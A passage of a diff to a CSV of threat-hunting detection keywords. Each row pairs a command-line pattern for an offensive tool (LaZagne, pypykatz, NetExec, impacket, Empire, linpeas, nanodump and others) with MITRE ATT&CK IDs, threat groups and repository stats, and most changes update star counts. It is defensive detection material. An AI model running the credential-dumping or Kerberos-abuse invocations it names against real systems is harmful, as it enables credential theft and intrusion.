T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --krbpass * --krbsalt * -t * --escalate-user *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* --krbpass *--krbsalt*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","2","900","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"* --krbpass *--krbsalt*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" "* KRBUACBypass*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" -"* -l nmapRssuilt.xml -v*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"* -l nmapRssuilt.xml -v*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" "* Ladon.ps1*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "* Ladon.py*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "* Lalin.sh*","offensive_tool_keyword","LALIN","this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . install another and update to new","T1588","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/LALIN","1","0","N/A","N/A","4","350","164","2017-04-13T13:47:21Z","2016-06-10T07:53:49Z" "* laps.py *--ldapserver*","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","10","3","222","34","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" "* laps.py *-u * -p *","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","10","3","222","34","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" -"* laZagne.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"* laZagne.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" "* lazypariah*","offensive_tool_keyword","LAZYPARIAH","LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly","T1059 - T1566 - T1212 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/octetsplicer/LAZYPARIAH","1","0","N/A","N/A","2","136","30","2022-06-18T08:59:45Z","2020-11-20T05:08:36Z" -"* ldap * --gmsa *dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* ldap * --trusted-for-delegation*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* ldap * -u * -p * --admin-count*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* ldap * -u * -p * -M whoami *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"* ldap * --gmsa *dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* ldap * --trusted-for-delegation*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* ldap * -u * -p * --admin-count*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* ldap * -u * -p * -M whoami *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "* ldap-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ldap-novell-getpass.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ldap-rootdse.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ldap-search.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* --ldapusername * --ldappassword *","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" +"* --ldapusername * --ldappassword *","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" "* ldeep_dump *","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","0","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z" "* lexmark-config.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* linpeas.sh *","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" +"* linpeas.sh *","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" "* linpeas.sh*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* -linpeas=http://127.0.0.1/linpeas.sh*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" -"* linWinPwn*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* --list=hidden-options*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* -linpeas=http://127.0.0.1/linpeas.sh*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"* linWinPwn*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* --list=hidden-options*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "* --list-payloads*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "* live dpapi blobfile *.blob*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "* live dpapi cred *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" @@ -1164,13 +1164,13 @@ "* live smbapi share enum*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "* live users whoami*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "* llmnr-resolve.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -LLMNRTTL *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -LLMNRTTL *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -llmnrtypes AAAA*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" "* lltd-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --llvm-obfuscator * ","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","0","N/A","N/A","7","651","113","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" -"* LMHASH:NTHASH*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"* -LNKPath * -EncScript *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-BackdoorLNK.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* load_extra_pots*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* LMHASH:NTHASH*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -LNKPath * -EncScript *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-BackdoorLNK.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* load_extra_pots*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "* --load-dll *ssp.dll*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS 